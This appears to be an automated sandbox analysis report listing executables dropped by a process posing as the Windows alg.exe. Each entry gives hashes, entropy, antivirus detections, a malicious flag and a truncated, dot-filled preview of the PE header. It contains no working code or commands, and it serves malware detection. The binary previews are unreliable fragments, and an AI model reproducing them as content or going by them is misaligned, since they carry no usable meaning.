                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......`......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                    Entropy (8bit):5.446065638650286
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:XnEbH0j4x7R6SvyCMrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:XkwOtO7rsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:C2A7B876AF489FCC3E42DACE89DAFDE0
                                                                                                                                                                                                    SHA1:079D7CC7DC08EAFBD8D2C7DADCAF4B4CA5342A60
                                                                                                                                                                                                    SHA-256:D9F210F727580681698B3445214B77B63F983F1EB782C212B6903D168249B861
                                                                                                                                                                                                    SHA-512:FD9DD9F19993C90330A569407C322A2DB7C36261FF166BE83059AA40DA2F838181752641768CF56A08F79106531F2F271773B14E770B0868FC942C9F2BE01050
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......M7.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                    Entropy (8bit):5.446816323279703
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:2nU/h/4KcsqjnhMgeiCl7G0nehbGZpbD:2U/VIDmg27RnWGj
                                                                                                                                                                                                    MD5:DD6BDF45A215E6A9643541C6C1AEBDCE
                                                                                                                                                                                                    SHA1:EB1F81567D4411DE77E90DB83577996E8B71CC9E
                                                                                                                                                                                                    SHA-256:788E3C30CDCC09579EE8597232D397027D5485ED11D923A9D1A8F167643CD64E
                                                                                                                                                                                                    SHA-512:F3871772877266C1E8AF25A84145D96314F854F5EEA67D9DF29588CB6C6884921A4E231FDC3EF646729F40E7EE46D32EA42270156A4E45861240A8755399D437
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......@........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                    Entropy (8bit):5.48373238632038
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:px71iBLZ05jNTmJWExvsqjnhMgeiCl7G0nehbGZpbD:pxhiHIjNgTDmg27RnWGj
                                                                                                                                                                                                    MD5:3EE3467481AE751437E50CED2615F2C6
                                                                                                                                                                                                    SHA1:3CCAA3C8847EE991E81AA842E1304F45205095B3
                                                                                                                                                                                                    SHA-256:CFC015E622850092AE434C1BAE2138A42955B3410CDDCF723869FD54FBA5B720
                                                                                                                                                                                                    SHA-512:8B781CD28DB6407C5209DD1673BF0673AB1281F2C483A748CCA3B758422E93B587585A1C44DF48E97215E9567005A201F73654FE82D123FE32F788AD777CC76F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................R..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                                                    Entropy (8bit):5.466711831292199
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:mlnRklQ6fgJcEwixtsqjnhMgeiCl7G0nehbGZpbD:CoRfgJcEwCRDmg27RnWGj
                                                                                                                                                                                                    MD5:2EBE746A0986FFE7A173E916A2149AC5
                                                                                                                                                                                                    SHA1:412BBD276B69CB18FC73649AE839043935417E27
                                                                                                                                                                                                    SHA-256:3800226B135EA3EFE7FA828896E59221AA6B59025AC8129E82114C3CB0DEBA28
                                                                                                                                                                                                    SHA-512:568ED85321B0BCF35D1B3AF02A723ACA58D854B5F92536EBE6D4A47A815F0C27B625597BB1FEC04F873971BA6B8B96FFB4FBD465B882B139870F3F94A7DDAAA4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................)......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                                                    Entropy (8bit):5.496523784512784
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:LW25k8hb0Haw+xdsqjnhMgeiCl7G0nehbGZpbD:LWyk8SHawmBDmg27RnWGj
                                                                                                                                                                                                    MD5:924AFC498088ECCF5B43D2FED3256F84
                                                                                                                                                                                                    SHA1:7EF994C715EE6BB0151AC026E163428A62D11366
                                                                                                                                                                                                    SHA-256:6513E63CE4B29D576137329B2658113D6EB6563558DC6CB4F60088BBF4B64133
                                                                                                                                                                                                    SHA-512:02575A78BD2A3B40AC59F64050B442ADB194FB1A5AC7D454E5692906AEB0DB0E23C12AFC4AA75A014EFBCCF4B853ABB0522B866BD2C6EE185801F805CA17DA3E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................u..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                    Entropy (8bit):5.163937816439657
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:VWP/aK2vB+iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:VKCKABlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:097820BBE1E4BF8BEB658073840FC2F9
                                                                                                                                                                                                    SHA1:5CA97E9AEE5809A099A848DE205F2BCF98C431CB
                                                                                                                                                                                                    SHA-256:9E6A1FB172FBF39678D989A3E47EE607756E6D48E4FF494E95B52340292E4832
                                                                                                                                                                                                    SHA-512:AE64035C563FDF91732066B796D80580C55F60E54DE167CAA5B1265AE8828E103EC52C632BBDC5691FF7C92CEBFC9E58B146FF725459B4C4B93935FA86E00318
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                    Entropy (8bit):5.162018988085435
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:CO7cCNWB+09sXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:fjNWBPysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:5A3DFA6C71C6865BB5D5AFFE0927C336
                                                                                                                                                                                                    SHA1:7972EC3E1FFA8F329D53C135557997DB51CF1CF0
                                                                                                                                                                                                    SHA-256:BF91C97710CA578331B3C7F6765A42E092F669EB4116241B247215808792B1FD
                                                                                                                                                                                                    SHA-512:5E6B73A17C575112CB64B7E669407487CF4FE46C511210DDD337D934C2A3C10BB73C026640703010C7D7F581054DADFCA21CA2B224F27B84ECC48E0F12290BC9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................x{.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                    Entropy (8bit):5.238914331318834
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:+ihRyhdsRrosqjnhMgeiCl7G0nehbGZpbD:+ihsoRUDmg27RnWGj
                                                                                                                                                                                                    MD5:B6D84F46DC8690F65A12DFBFAFDBA9C5
                                                                                                                                                                                                    SHA1:C3EC99CEEFC3D75777EC57FF9B6BF286276345E0
                                                                                                                                                                                                    SHA-256:E55990E972E0D017FCABB92BFE0E86C7C15F33BCF7D3DF377E8FA3C24453101C
                                                                                                                                                                                                    SHA-512:2C19E7CDFBE252005CABF39806E45EC3601DBA4031E18CEFC408271C24C7339BB782214538EEB1E2585AE3DBC104D15799F56D4FC050423CE8DD02D11274A30E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                    Entropy (8bit):5.35100953867862
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:11FDmRF+wpx/QafDsqjnhMgeiCl7G0nehbGZpbD:lmRF+wn/JfHDmg27RnWGj
                                                                                                                                                                                                    MD5:62B0965ABCD6577BBF0E666E1E12EE20
                                                                                                                                                                                                    SHA1:9B131C627E0256AF717A99B6473F6655B5C6B75E
                                                                                                                                                                                                    SHA-256:EDCD1FEF776D4347853CD17795CF805234DC1D716CD07D8F349E9E5900A80321
                                                                                                                                                                                                    SHA-512:7F6203BC1C9748AC0CFC1D14B9C7D7AE118A65FC1635950EDAE701B577C06F2DC4BF12AE943AF4432820ABAA0E97E7361AF837F80A1C352EE815019C3F72A3FD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................:................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                    Entropy (8bit):5.161979023154444
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:e2Ae621B+0YmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:zE21BPxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:7099BF464FB5E2D5594CD9333F0E2207
                                                                                                                                                                                                    SHA1:9ACD724FF69BF276535155957E227A7D3D08B687
                                                                                                                                                                                                    SHA-256:7FA05CCAAF98D223A18DBC047699F83AF248342AD26CCE2174E1C28FD7E6000A
                                                                                                                                                                                                    SHA-512:FCB31F96B5155073BECB5F0ED908264293AD72F34B93A915116F9B8C05550670F5D10F654C19D73728467F06EE0FE0C325915E78DA0DA415CE4BCBA771A7AD75
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................I{.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):105669632
                                                                                                                                                                                                    Entropy (8bit):7.999989847599161
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3145728:eLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:sBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                    MD5:25B7706A0145A248FA5C390549EC2DBB
                                                                                                                                                                                                    SHA1:89487A1195F2A66C41A9CE34EE034924BA789197
                                                                                                                                                                                                    SHA-256:3DD819E47584E9C8C7CDFA0C7DF529174A0A874AE3A517B219B6758613BB1708
                                                                                                                                                                                                    SHA-512:75315D4E6C6BC1C741B781FE7909226FE171F96D7D8158C98F8721306E30851D7C6CF86588FE385190A25C539185E5B445B34348DF90E2F6ADB69B160E72011F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                                                    Entropy (8bit):5.068073212795225
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:VlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:4FE31FB578DA2E2FB9ED76E9E11F6A97
                                                                                                                                                                                                    SHA1:B3EA4563F75F6368225F86BEF77ADE0BDBAD35C4
                                                                                                                                                                                                    SHA-256:C3816A053B6B79D68B0F993063A6EF67ECEC8EB36C8DC52E16846EB2A817FF7B
                                                                                                                                                                                                    SHA-512:A63960B5DF9DE18332712E2069ADCAE7DEFEBCC0A444DAFA7CE38C676785AA4F24881C3114D4850445E1B84C2C6340D46312E9E3D53E6919F278D1B7E38C25E0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................. ......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                    Entropy (8bit):5.032403233429513
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:fKCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:A191708A8EE423FEEEA157938404B169
                                                                                                                                                                                                    SHA1:51CE92996591C751D505913BCE0796E510C3257F
                                                                                                                                                                                                    SHA-256:00E7F5781FA0C92113AC4B284BAB80DC1486F534ABEB9F8312E2A124AC25A8B2
                                                                                                                                                                                                    SHA-512:9F05FC866400C9E5E908A8618B342C3A6775891D6C8D0292E500640A1EF0A4287DB984C1A163F93E1DA730DAD370F86851AE9205EC440292FFF553C0A4065296
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................#........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                    Entropy (8bit):5.4460532520124705
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:jnEbH0j4x7R6SvyCMrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:jkwOtO7rsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:52100B8F157CBDEBEFF94D41A6A12AB6
                                                                                                                                                                                                    SHA1:41C433FCDABEE69F6FABE4549319250C9061899C
                                                                                                                                                                                                    SHA-256:4793D4B2011B22622FC45C9FCE6F1A95544EBAB03B8B75B060BECEA0FAFF188F
                                                                                                                                                                                                    SHA-512:B2968BB0DC40621B9F1F23C09C952E098C0742B80F3E51A811A93E7790812E01541D10F8039FED58ED984FB860FA01BC6C22A95395B138900FA79FF6809430B4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1212416
                                                                                                                                                                                                    Entropy (8bit):5.119730129333301
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:Pv1vveXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:H1+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:E1C4D439BAFA341AAA60CB6F6FD38488
                                                                                                                                                                                                    SHA1:7ED3A6BCE34DF8635B2053EBAA0CA10DBCACF405
                                                                                                                                                                                                    SHA-256:9734E887572BC0C20FEBE656569E0E1D7D1E3FDDD42400F0A9DB9B6C19650984
                                                                                                                                                                                                    SHA-512:D779E2E5D8E307CCBFC767C7415366F179B85EAF9DAABA9864291BFE2D6EBABDA0CA986FD67ECEC6EB53C902262A453EED52653F5F9D403554FFBFA55BAD5F69
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                    Entropy (8bit):5.446812886068743
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:7nU/h/4KcsqjnhMgeiCl7G0nehbGZpbD:7U/VIDmg27RnWGj
                                                                                                                                                                                                    MD5:05EFBBD4EF7FEAA8291F5F9DE4470525
                                                                                                                                                                                                    SHA1:2B8689154AF42C939AC140DC91B3645BB307FF2E
                                                                                                                                                                                                    SHA-256:8E0DFDC8C3D4504967D1F48A653C0A7815C00221C490DDEAAD3FB3DCB92A54E3
                                                                                                                                                                                                    SHA-512:14A796D29FAAC543D896D23357A13F2A456060BFA6D8FFBEC21852F354D1114B1EAEA33E03EC76722D8E74B2E24A3391BE53DCC6BFB72C53E50BA59D5BC0437A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                    Entropy (8bit):5.483736500892319
                                                                                                                                                                                                    Encrypted:false
